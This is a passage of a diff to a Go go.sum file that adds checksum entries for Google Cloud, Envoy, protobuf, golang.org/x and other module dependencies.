h1:bpvi9YIyU7wCW9WiXL/ZKT7pd2Ovegyr2xENIeRX5q0= +cloud.google.com/go/osconfig v1.15.1 h1:QQzK5njfsfO2rdOWYVDyLQktqSq9gKf2ohRYeKUuA10= +cloud.google.com/go/osconfig v1.15.1/go.mod h1:NegylQQl0+5m+I+4Ey/g3HGeQxKkncQ1q+Il4DZ8PME= +cloud.google.com/go/pubsub v1.50.1 h1:fzbXpPyJnSGvWXF1jabhQeXyxdbCIkXTpjXHy7xviBM= +cloud.google.com/go/pubsub v1.50.1/go.mod h1:6YVJv3MzWJUVdvQXG081sFvS0dWQOdnV+oTo++q/xFk= +cloud.google.com/go/pubsub/v2 v2.0.0 h1:0qS6mRJ41gD1lNmM/vdm6bR7DQu6coQcVwD+VPf0Bz0= +cloud.google.com/go/pubsub/v2 v2.0.0/go.mod h1:0aztFxNzVQIRSZ8vUr79uH2bS3jwLebwK6q1sgEub+E= cloud.google.com/go/resourcemanager v1.10.7 h1:oPZKIdjyVTuag+D4HF7HO0mnSqcqgjcuA18xblwA0V0= cloud.google.com/go/resourcemanager v1.10.7/go.mod 
h1:rScGkr6j2eFwxAjctvOP/8sqnEpDbQ9r5CKwKfomqjs= cloud.google.com/go/secretmanager v1.16.0 h1:19QT7ZsLJ8FSP1k+4esQvuCD7npMJml6hYzilxVyT+k= cloud.google.com/go/secretmanager v1.16.0/go.mod h1://C/e4I8D26SDTz1f3TQcddhcmiC3rMEl0S1Cakvs3Q= +cloud.google.com/go/securitycenter v1.38.1 h1:D9zpeguY4frQU35GBw8+M6Gw79CiuTF9iVs4sFm3FDY= +cloud.google.com/go/securitycenter v1.38.1/go.mod h1:Ge2D/SlG2lP1FrQD7wXHy8qyeloRenvKXeB4e7zO6z0= cloud.google.com/go/storage v1.58.0 h1:PflFXlmFJjG/nBeR9B7pKddLQWaFaRWx4uUi/LyNxxo= cloud.google.com/go/storage v1.58.0/go.mod h1:cMWbtM+anpC74gn6qjLh+exqYcfmB9Hqe5z6adx+CLI= cloud.google.com/go/trace v1.11.7 h1:kDNDX8JkaAG3R2nq1lIdkb7FCSi1rCmsEtKVsty7p+U= @@ -84,6 +101,7 @@ github.com/AzureAD/microsoft-authentication-extensions-for-go/cache v0.1.1 h1:WJ github.com/AzureAD/microsoft-authentication-extensions-for-go/cache v0.1.1/go.mod h1:tCcJZ0uHAmvjsVYzEFivsRTN00oz5BEsRgQHu5JZ9WE= github.com/AzureAD/microsoft-authentication-library-for-go v1.6.0 h1:XRzhVemXdgvJqCH0sFfrBUTnUJSBrBf7++ypk+twtRs= github.com/AzureAD/microsoft-authentication-library-for-go v1.6.0/go.mod h1:HKpQxkWaGLJ+D/5H8QRpyQXA1eKjxkFlOMwck5+33Jk= +github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.30.0 h1:sBEjpZlNHzK1voKq9695PJSX2o5NEXl7/OL3coiIY0c= github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.30.0/go.mod h1:P4WPRUkOhJC13W//jWpyfJNDAIpvRbAUIYLX/4jtlE0= github.com/GoogleCloudPlatform/opentelemetry-operations-go/exporter/metric v0.54.0 h1:lhhYARPUu3LmHysQ/igznQphfzynnqI3D75oUyw1HXk= @@ -240,6 +258,7 @@ github.com/bishopfox/awsservicemap v1.1.0 h1:MM+rmGsXjkBtFR1IlS+GpVKR2srGr+V4l/J github.com/bishopfox/awsservicemap v1.1.0/go.mod h1:oy9Fyqh6AozQjShSx+zRNouTlp7k3z3YEMoFkN8rquc= github.com/bishopfox/knownawsaccountslookup v0.0.0-20231228165844-c37ef8df33cb h1:ot96tC/kdm0GKV1kl+aXJorqJbyx92R9bjRQvbBmLKU= 
github.com/bishopfox/knownawsaccountslookup v0.0.0-20231228165844-c37ef8df33cb/go.mod h1:2OnSqu4B86+2xGSIE5D4z3Rze9yJ/LNNjNXHhwMR+vY= +github.com/census-instrumentation/opencensus-proto v0.2.1/go.mod h1:f6KPmirojxKA12rnyqOA5BBL4O983OfeGPqjHWSTneU= github.com/cespare/xxhash/v2 v2.3.0 h1:UL815xU9SqsFlibzuggzjXhog7bL6oX9BbNZnL2UFvs= github.com/cespare/xxhash/v2 v2.3.0/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs= github.com/charmbracelet/bubbles v0.21.0 h1:9TdC97SdRVg/1aaXNVWfFH3nnLAwOXr8Fn6u6mfQdFs= @@ -258,12 +277,14 @@ github.com/charmbracelet/x/exp/golden v0.0.0-20241011142426-46044092ad91 h1:payR github.com/charmbracelet/x/exp/golden v0.0.0-20241011142426-46044092ad91/go.mod h1:wDlXFlCrmJ8J+swcL/MnGUuYnqgQdW9rhSD61oNMb6U= github.com/charmbracelet/x/term v0.2.2 h1:xVRT/S2ZcKdhhOuSP4t5cLi5o+JxklsoEObBSgfgZRk= github.com/charmbracelet/x/term v0.2.2/go.mod h1:kF8CY5RddLWrsgVwpw4kAa6TESp6EB5y3uxGLeCqzAI= +github.com/client9/misspell v0.3.4/go.mod h1:qj6jICC3Q7zFZvVWo7KLAzC3yx5G7kyvSDkc90ppPyw= github.com/clipperhouse/displaywidth v0.6.1 h1:/zMlAezfDzT2xy6acHBzwIfyu2ic0hgkT83UX5EY2gY= github.com/clipperhouse/displaywidth v0.6.1/go.mod h1:R+kHuzaYWFkTm7xoMmK1lFydbci4X2CicfbGstSGg0o= github.com/clipperhouse/stringish v0.1.1 h1:+NSqMOr3GR6k1FdRhhnXrLfztGzuG+VuFDfatpWHKCs= github.com/clipperhouse/stringish v0.1.1/go.mod h1:v/WhFtE1q0ovMta2+m+UbpZ+2/HEXNWYXQgCt4hdOzA= github.com/clipperhouse/uax29/v2 v2.3.0 h1:SNdx9DVUqMoBuBoW3iLOj4FQv3dN5mDtuqwuhIGpJy4= github.com/clipperhouse/uax29/v2 v2.3.0/go.mod h1:Wn1g7MK6OoeDT0vL+Q0SQLDz/KpfsVRgg6W7ihQeh4g= +github.com/cncf/udpa/go v0.0.0-20191209042840-269d4d468f6f/go.mod h1:M8M6+tZqaGXZJjfX53e64911xZQV5JYwmTeXPW+k8Sc= github.com/cncf/xds/go v0.0.0-20251210132809-ee656c7534f5 h1:6xNmx7iTtyBRev0+D/Tv1FZd4SCg8axKApyNyRsAt/w= github.com/cncf/xds/go v0.0.0-20251210132809-ee656c7534f5/go.mod h1:KdCmV+x/BuvyMxRnYBlmVaq4OLiKW6iRQfvC62cvdkI= github.com/cpuguy83/go-md2man/v2 v2.0.6/go.mod 
h1:oOW0eioCTA6cOiMLiUPZOpcVxMig6NIQQ7OS05n1F4g= @@ -275,12 +296,16 @@ github.com/dimchansky/utfbom v1.1.1 h1:vV6w1AhK4VMnhBno/TPVCoK9U/LP0PkLCS9tbxHdi github.com/dimchansky/utfbom v1.1.1/go.mod h1:SxdoEBH5qIqFocHMyGOXVAybYJdr71b1Q/j0mACtrfE= github.com/dominikbraun/graph v0.23.0 h1:TdZB4pPqCLFxYhdyMFb1TBdFxp8XLcJfTTBQucVPgCo= github.com/dominikbraun/graph v0.23.0/go.mod h1:yOjYyogZLY1LSG9E33JWZJiq5k83Qy2C6POAuiViluc= +github.com/envoyproxy/go-control-plane v0.9.0/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= +github.com/envoyproxy/go-control-plane v0.9.1-0.20191026205805-5f8ba28d4473/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= +github.com/envoyproxy/go-control-plane v0.9.4/go.mod h1:6rpuAdCZL397s3pYoYcLgu1mIlRU8Am5FuJP05cCM98= github.com/envoyproxy/go-control-plane v0.13.5-0.20251024222203-75eaa193e329 h1:K+fnvUM0VZ7ZFJf0n4L/BRlnsb9pL/GuDG6FqaH+PwM= github.com/envoyproxy/go-control-plane v0.13.5-0.20251024222203-75eaa193e329/go.mod h1:Alz8LEClvR7xKsrq3qzoc4N0guvVNSS8KmSChGYr9hs= github.com/envoyproxy/go-control-plane/envoy v1.36.0 h1:yg/JjO5E7ubRyKX3m07GF3reDNEnfOboJ0QySbH736g= github.com/envoyproxy/go-control-plane/envoy v1.36.0/go.mod h1:ty89S1YCCVruQAm9OtKeEkQLTb+Lkz0k8v9W0Oxsv98= github.com/envoyproxy/go-control-plane/ratelimit v0.1.0 h1:/G9QYbddjL25KvtKTv3an9lx6VBE2cnb8wp1vEGNYGI= github.com/envoyproxy/go-control-plane/ratelimit v0.1.0/go.mod h1:Wk+tMFAFbCXaJPzVVHnPgRKdUdwW/KdbRt94AzgRee4= +github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c= github.com/envoyproxy/protoc-gen-validate v1.3.0 h1:TvGH1wof4H33rezVKWSpqKz5NXWg5VPuZ0uONDT6eb4= github.com/envoyproxy/protoc-gen-validate v1.3.0/go.mod h1:HvYl7zwPa5mffgyeTUHA9zHIH36nmrm7oCbo4YKoSWA= github.com/erikgeiser/coninput v0.0.0-20211004153227-1c3628e74d0f h1:Y/CXytFA4m6baUTXGLOoWe4PQhGxaX0KpnayAqC48p4= @@ -313,16 +338,37 @@ github.com/golang-jwt/jwt/v4 v4.5.2 h1:YtQM7lnr8iZ+j5q71MGKkNw9Mn7AjHM68uc9g5fXe github.com/golang-jwt/jwt/v4 
v4.5.2/go.mod h1:m21LjoU+eqJr34lmDMbreY2eSTRJ1cv77w39/MY0Ch0= github.com/golang-jwt/jwt/v5 v5.3.0 h1:pv4AsKCKKZuqlgs5sUmn4x8UlGa0kEVt/puTpKx9vvo= github.com/golang-jwt/jwt/v5 v5.3.0/go.mod h1:fxCRLWMO43lRc8nhHWY6LGqRcf+1gQWArsqaEUEa5bE= +github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b/go.mod h1:SBH7ygxi8pfUlaOkMMuAQtPIUF8ecWP5IEl/CR7VP2Q= +github.com/golang/groupcache v0.0.0-20200121045136-8c9f03a8e57e/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= +github.com/golang/groupcache v0.0.0-20210331224755-41bb18bfe9da h1:oI5xCqsCo564l8iNU+DwB5epxmsaqB+rhGL0m5jtYqE= +github.com/golang/groupcache v0.0.0-20210331224755-41bb18bfe9da/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= +github.com/golang/mock v1.1.1/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A= +github.com/golang/protobuf v1.2.0/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= +github.com/golang/protobuf v1.3.2/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= +github.com/golang/protobuf v1.4.0-rc.1/go.mod h1:ceaxUfeHdC40wWswd/P6IGgMaK3YpKi5j83Wpe3EHw8= +github.com/golang/protobuf v1.4.0-rc.1.0.20200221234624-67d41d38c208/go.mod h1:xKAWHe0F5eneWXFV3EuXVDTCmh+JuBKY0li0aMyXATA= +github.com/golang/protobuf v1.4.0-rc.2/go.mod h1:LlEzMj4AhA7rCAGe4KMBDvJI+AwstrUpVNzEA03Pprs= +github.com/golang/protobuf v1.4.0-rc.4.0.20200313231945-b860323f09d0/go.mod h1:WU3c8KckQ9AFe+yFwt9sWVRKCVIyN9cPHBJSNnbL67w= +github.com/golang/protobuf v1.4.0/go.mod h1:jodUvKwWbYaEsadDk5Fwe5c77LiNKVO9IDvqG2KuDX0= +github.com/golang/protobuf v1.4.1/go.mod h1:U8fpvMrcmy5pZrNK1lt4xCsGvpyWQ/VVv6QDs8UjoX8= +github.com/golang/protobuf v1.4.3/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI= github.com/golang/protobuf v1.5.4 h1:i7eJL8qZTpSEXOPTxNKhASYpMn+8e5Q6AdndVa1dWek= github.com/golang/protobuf v1.5.4/go.mod h1:lnTiLA8Wa4RWRcIUkrtSVa5nRhsEGBg48fD6rSs7xps= github.com/google/flatbuffers v25.9.23+incompatible h1:rGZKv+wOb6QPzIdkM2KxhBZCDrA0DeN6DNmRDrqIsQU= github.com/google/flatbuffers 
v25.9.23+incompatible/go.mod h1:1AeVuKshWv4vARoZatz6mlQ0JxURH0Kv5+zNeJKJCa8= +github.com/google/go-cmp v0.2.0/go.mod h1:oXzfMopK8JAjlY9xF4vHSVASa0yLyX7SntLO5aqRK0M= +github.com/google/go-cmp v0.3.0/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= +github.com/google/go-cmp v0.3.1/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= +github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.3/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/go-cmp v0.7.0 h1:wk8382ETsv4JYUZwIsn6YpYiWiBsYLSJiTsyBybVuN8= github.com/google/go-cmp v0.7.0/go.mod h1:pXiqmnSA92OHEEa9HXL2W4E7lf9JzCmGVUdgjX3N/iU= github.com/google/martian/v3 v3.3.3 h1:DIhPTQrbPkgs2yJYdXU/eNACCG5DVQjySNRNlflZ9Fc= github.com/google/martian/v3 v3.3.3/go.mod h1:iEPrYcgCF7jA9OtScMFQyAlZZ4YXTKEtJ1E6RWzmBA0= github.com/google/s2a-go v0.1.9 h1:LGD7gtMgezd8a/Xak7mEWL0PjoTQFvpRudN895yqKW0= github.com/google/s2a-go v0.1.9/go.mod h1:YA0Ei2ZQL3acow2O62kdp9UlnvMmU7kA6Eutn0dXayM= +github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/google/uuid v1.6.0 h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0= github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/googleapis/enterprise-certificate-proxy v0.3.7 h1:zrn2Ee/nWmHulBx5sAVrGgAa0f2/R35S4DJwfFaUPFQ= @@ -380,6 +426,7 @@ github.com/planetscale/vtprotobuf v0.6.1-0.20240319094008-0393e58bdf10/go.mod h1 github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= github.com/pmezard/go-difflib v1.0.1-0.20181226105442-5d4384ee4fb2 h1:Jamvg5psRIccs7FGNTlIRMkT8wgtp5eCXdBlqhYGL6U= github.com/pmezard/go-difflib v1.0.1-0.20181226105442-5d4384ee4fb2/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= +github.com/prometheus/client_model v0.0.0-20190812154241-14fe0d1b01d4/go.mod 
h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA= github.com/rivo/uniseg v0.4.7 h1:WUdvkW8uEhrYfLC4ZzdpI2ztxP1I582+49Oc5Mq64VQ= github.com/rivo/uniseg v0.4.7/go.mod h1:FN3SvrM+Zdj16jyLfmOkMNblXMcoc8DfTHruCPUcx88= github.com/rogpeppe/go-internal v1.14.1 h1:UQB4HGPB6osV0SQTLymcB4TgvyWu6ZyliaW0tI/otEQ= @@ -403,6 +450,7 @@ github.com/stretchr/testify v1.3.0/go.mod h1:M5WIy9Dh21IEIfnGCwXGc5bZfKNJtfHm1UV github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= github.com/stretchr/testify v1.7.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= github.com/stretchr/testify v1.8.0/go.mod h1:yNjHg4UonilssWZ8iaSj1OCr/vHnekPRkoO+kdMU+MU= +github.com/stretchr/testify v1.8.1/go.mod h1:w2LPCIKwWwSfY2zedu0+kehJoqGctiVI29o6fzry7u4= github.com/stretchr/testify v1.8.2/go.mod h1:w2LPCIKwWwSfY2zedu0+kehJoqGctiVI29o6fzry7u4= github.com/stretchr/testify v1.11.1 h1:7s2iGBzp5EwR7/aIZr8ao5+dra3wiQyKjjFuvgVKu7U= github.com/stretchr/testify v1.11.1/go.mod h1:wZwfW3scLgRK+23gO65QZefKpKQRnfz6sD981Nm4B6U= @@ -413,8 +461,12 @@ github.com/zeebo/assert v1.3.0 h1:g7C04CbJuIDKNPFHmsk4hwZDO5O+kntRxzaUoNXj+IQ= github.com/zeebo/assert v1.3.0/go.mod h1:Pq9JiuJQpG8JLJdtkwrJESF0Foym2/D9XMU5ciN/wJ0= github.com/zeebo/xxh3 v1.0.2 h1:xZmwmqxHZA8AI603jOQ0tMqmBr9lPeFwGg6d+xy9DC0= github.com/zeebo/xxh3 v1.0.2/go.mod h1:5NWz9Sef7zIDm2JHfFlcQvNekmcEl9ekUZQQKCYaDcA= +go.einride.tech/aip v0.73.0 h1:bPo4oqBo2ZQeBKo4ZzLb1kxYXTY1ysJhpvQyfuGzvps= +go.einride.tech/aip v0.73.0/go.mod h1:Mj7rFbmXEgw0dq1dqJ7JGMvYCZZVxmGOR3S4ZcV5LvQ= go.mongodb.org/mongo-driver v1.17.6 h1:87JUG1wZfWsr6rIz3ZmpH90rL5tea7O3IHuSwHUpsss= go.mongodb.org/mongo-driver v1.17.6/go.mod h1:Hy04i7O2kC4RS06ZrhPRqj/u4DTYkFDAAccj+rVKqgQ= +go.opencensus.io v0.24.0 h1:y73uSU6J157QMP2kn2r30vwW1A2W2WFwSCGnAVxeaD0= +go.opencensus.io v0.24.0/go.mod h1:vNK8G9p7aAivkbmorf4v+7Hgx+Zs0yY+0fOtgBfjQKo= go.opentelemetry.io/auto/sdk v1.2.1 h1:jXsnJ4Lmnqd11kwkBV2LgLoFMZKizbCi5fNZ/ipaZ64= go.opentelemetry.io/auto/sdk v1.2.1/go.mod 
h1:KRTj+aOaElaLi+wW1kO/DZRXwkF4C5xPbEe3ZiIhN7Y= go.opentelemetry.io/contrib/detectors/gcp v1.39.0 h1:kWRNZMsfBHZ+uHjiH4y7Etn2FK26LAGkNFw7RHv1DhE= @@ -437,18 +489,29 @@ go.opentelemetry.io/otel/trace v1.39.0 h1:2d2vfpEDmCJ5zVYz7ijaJdOF59xLomrvj7bjt6 go.opentelemetry.io/otel/trace v1.39.0/go.mod h1:88w4/PnZSazkGzz/w84VHpQafiU4EtqqlVdxWy+rNOA= go.yaml.in/yaml/v3 v3.0.4/go.mod h1:DhzuOOF2ATzADvBadXxruRBLzYTpT36CKvDb3+aBEFg= golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= +golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= golang.org/x/crypto v0.0.0-20210921155107-089bfa567519/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= golang.org/x/crypto v0.0.0-20220722155217-630584e8d5aa/go.mod h1:IxCIyHEi3zRg3s0A5j5BB6A9Jmi73HwBIUl50j+osU4= golang.org/x/crypto v0.17.0/go.mod h1:gCAAfMLgwOJRpTjQ2zCCt2OcSfYMTeZVSRtQlPC7Nq4= golang.org/x/crypto v0.46.0 h1:cKRW/pmt1pKAfetfu+RCEvjvZkA9RimPbh7bhFjGVBU= golang.org/x/crypto v0.46.0/go.mod h1:Evb/oLKmMraqjZ2iQTwDwvCtJkczlDuTmdJXoZVzqU0= +golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= golang.org/x/exp v0.0.0-20251209150349-8475f28825e9 h1:MDfG8Cvcqlt9XXrmEiD4epKn7VJHZO84hejP9Jmp0MM= golang.org/x/exp v0.0.0-20251209150349-8475f28825e9/go.mod h1:EPRbTFwzwjXj9NpYyyrvenVh9Y+GFeEvMNh7Xuz7xgU= +golang.org/x/lint v0.0.0-20181026193005-c67002cb31c3/go.mod h1:UVdnD1Gm6xHRNCYTkRU2/jEulfH38KcIWyp/GAMgvoE= +golang.org/x/lint v0.0.0-20190227174305-5b3e6a55c961/go.mod h1:wehouNa3lNwaWXcvxsM5YxQ5yQlVC4a0KAMCusXpPoU= +golang.org/x/lint v0.0.0-20190313153728-d0100b6bd8b3/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc= golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4= golang.org/x/mod v0.8.0/go.mod h1:iBbtSCu2XBx23ZKBPSOrRkjjQPZFPuis4dIYUhu/chs= golang.org/x/mod v0.31.0 
h1:HaW9xtz0+kOcWKwli0ZXy79Ix+UW/vOfmWI5QVd2tgI= golang.org/x/mod v0.31.0/go.mod h1:43JraMp9cGx1Rx3AqioxrbrhNsLl2l/iNAvuBkrezpg= +golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20190213061140-3a22650c66bd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20190311183353-d8887717615a/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= +golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20201110031124-69a78807bb2b/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU= golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= golang.org/x/net v0.0.0-20211112202133-69e39bad7dc2/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c= @@ -456,14 +519,20 @@ golang.org/x/net v0.6.0/go.mod h1:2Tu9+aMcznHK/AK1HMvgo6xiTLG5rD5rZLDS+rp2Bjs= golang.org/x/net v0.10.0/go.mod h1:0qNGK6F8kojg2nk9dLZ2mShWaEBan6FAoqfSigmmuDg= golang.org/x/net v0.48.0 h1:zyQRTTrjc33Lhh0fBgT/H3oZq9WuvRR5gPC70xpDiQU= golang.org/x/net v0.48.0/go.mod h1:+ndRgGjkh8FGtu1w1FGbEC31if4VrNVMuKTgcAAnQRY= +golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= golang.org/x/oauth2 v0.34.0 h1:hqK/t4AKgbqWkdkcAeI8XLmbK+4m4G5YeQRrmiotGlw= golang.org/x/oauth2 v0.34.0/go.mod h1:lzm5WQJQwKZ3nwavOZ3IS5Aulzxi68dUSgRHujetwEA= +golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20181108010431-42b317875d0f/go.mod 
h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20220722155255-886fb9371eb4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.1.0/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.19.0 h1:vV+1eWNmZ5geRlYjzm2adRgW2/mcpevXNg50YZtPCE4= golang.org/x/sync v0.19.0/go.mod h1:9KTHXmSnoGruLpwFjVSX0lNNA75CykiMECbovNTZqGI= +golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= @@ -499,26 +568,50 @@ golang.org/x/text v0.32.0/go.mod h1:o/rUWzghvpD5TXrTIBuJU77MTaN0ljMWE47kxGJQ7jY= golang.org/x/time v0.14.0 h1:MRx4UaLrDotUKUdCIqzPC48t1Y9hANFKIRpNx+Te8PI= golang.org/x/time v0.14.0/go.mod h1:eL/Oa2bBBK0TkX57Fyni+NgnyQQN4LitPmob2Hjnqw4= golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= +golang.org/x/tools v0.0.0-20190114222345-bf090417da8b/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= +golang.org/x/tools v0.0.0-20190226205152-f727befe758c/go.mod h1:9Yl7xja0Znq3iFh3HoIrodX9oNMXvdceNzlUR8zjMvY= +golang.org/x/tools v0.0.0-20190311212946-11955173bddd/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs= +golang.org/x/tools 
v0.0.0-20190524140312-2c0ae7006135/go.mod h1:RgjU9mgBXZiqYHBnxXauZ1Gv1EHHAz9KjViQ78xBX0Q= golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= golang.org/x/tools v0.1.12/go.mod h1:hNGJHUnrk76NpqgfD5Aqm5Crs+Hm0VOH/i9J2+nxYbc= golang.org/x/tools v0.6.0/go.mod h1:Xwgl3UAJ/d3gWutnCtw505GrjyAbvKui8lOU390QaIU= golang.org/x/tools v0.40.0 h1:yLkxfA+Qnul4cs9QA3KnlFu0lVmd8JJfoq+E41uSutA= golang.org/x/tools v0.40.0/go.mod h1:Ik/tzLRlbscWpqqMRjyWYDisX8bG13FrdXp3o4Sr9lc= golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= +golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20240903120638-7835f813f4da h1:noIWHXmPHxILtqtCOPIhSt0ABwskkZKjD3bXGnZGpNY= golang.org/x/xerrors v0.0.0-20240903120638-7835f813f4da/go.mod h1:NDW/Ps6MPRej6fsCIbMTohpP40sJ/P/vI1MoTEGwX90= gonum.org/v1/gonum v0.16.0 h1:5+ul4Swaf3ESvrOnidPp4GZbzf0mxVQpDCYUQE7OJfk= gonum.org/v1/gonum v0.16.0/go.mod h1:fef3am4MQ93R2HHpKnLk4/Tbh/s0+wqD5nfa6Pnwy4E= google.golang.org/api v0.257.0 h1:8Y0lzvHlZps53PEaw+G29SsQIkuKrumGWs9puiexNAA= google.golang.org/api v0.257.0/go.mod h1:4eJrr+vbVaZSqs7vovFd1Jb/A6ml6iw2e6FBYf3GAO4= +google.golang.org/appengine v1.1.0/go.mod h1:EbEs0AVv82hx2wNQdGPgUI5lhzA/G0D9YwlJXL52JkM= +google.golang.org/appengine v1.4.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4= +google.golang.org/genproto v0.0.0-20180817151627-c66870c02cf8/go.mod 